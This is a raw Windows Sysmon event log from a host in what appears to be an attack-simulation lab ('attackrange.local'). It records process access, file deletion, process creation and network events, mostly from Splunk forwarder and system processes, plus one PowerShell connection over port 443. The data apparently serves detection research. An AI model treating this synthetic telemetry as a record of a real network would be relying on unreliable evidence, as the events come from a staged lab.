13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496990Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496989Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496988Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496987Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036496986Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.143{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4770B160BEE7A5EA6C1CEB8E4213E27,SHA256=E7114BCC45ADE1FEB7BCB07B2B50FC8053A7A24CB26D3DF17200B381C59682C4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497021Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:19.942{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=307099EC5E24521AB13B04963B58D6C1,SHA256=B59577DA7D2F34DC3F7C8A9D859FC86D609B957E8A954FA522BA03496119A65F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497020Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:48.694{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50484-false10.0.1.12-8000- 23542300x800000000000000036497019Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:19.196{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5015425936AA4B6B9C369158F77BBDC4,SHA256=2EC04FFFCB9F801DAACFEE651A1DCA180B645174A79963CDC1ACE827A55993F2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497022Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:20.327{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=383CEC8B14D46146890ABA53B3F43B11,SHA256=7B4D0BB2A5280AD5BFD853A237DAAE7E88B49E9625783563503BBD614CE1AB8F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497024Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:50.593{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50485-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497023Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:21.379{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6290DF160C058383DB0D0D6B3140D893,SHA256=1D19DFE34344E6C7405B4ABE2B24AFC49A4E299BFA4F556EECE20E38BFE890C6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497025Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:22.426{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D0EDA51D75FCB939DA5173486629222,SHA256=9E09CE33E550D4AE03571D64B5922080C97DB3BA0ED126F24349B5B87DACBE54,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497027Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:23.440{B81B27B7-4024-611D-7300-00000000C801}2188NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B39D2C81E33C29A9507D7C0F1E550B6,SHA256=BDE2301A9F4195241BB1336D02A1F3C0C5493BEBD2A502CA8A2EAC3D1E3F5A0C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497026Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:23.225{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=C78E2D9E7FE3F8C3405156A7BBAC524A,SHA256=BA8E740E1E4A349767A71804088FA1BCBEEF07031921EF672269D9F8F5286941,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497045Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:24.877{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A06C-6140-7156-04000000C801}6632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497044Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:15:24.877{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497043Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:24.877{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497042Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:15:24.877{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497041Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:24.877{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497040Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:15:24.877{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A06C-6140-7156-04000000C801}6632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497039Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:24.877{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A06C-6140-7156-04000000C801}6632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497038Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:24.860{B81B27B7-A06C-6140-7156-04000000C801}6632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036497037Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:24.460{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0621F95A5FF3D0AD0940EF07BD7C13AE,SHA256=CB7B55E0151D0FA07D364A40C1B254684FBA03C923EA13971F5672A196D4228E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497036Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:24.193{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A06C-6140-7056-04000000C801}6808C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497035Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:15:24.193{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497034Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:24.193{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497033Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:15:24.193{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497032Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:24.193{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497031Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:15:24.193{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-A06C-6140-7056-04000000C801}6808C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497030Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:24.193{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A06C-6140-7056-04000000C801}6808C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497029Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:24.178{B81B27B7-A06C-6140-7056-04000000C801}6808C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036497028Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:24.159{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=6FB4DDA3670BBD427E9A26E01448735B,SHA256=377D9EADF219FEDBA067EA7B8AA0FFA3DA2A19B304C7A249C2A02E13CD7961B9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497051Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:25.492{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC4A4499B7A398DA34CFD16902E4C8F5,SHA256=92618297855F0A5D192B3A76839C6E5AF07B4A7673F367F21BEC1698A571F65E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497050Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:25.224{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
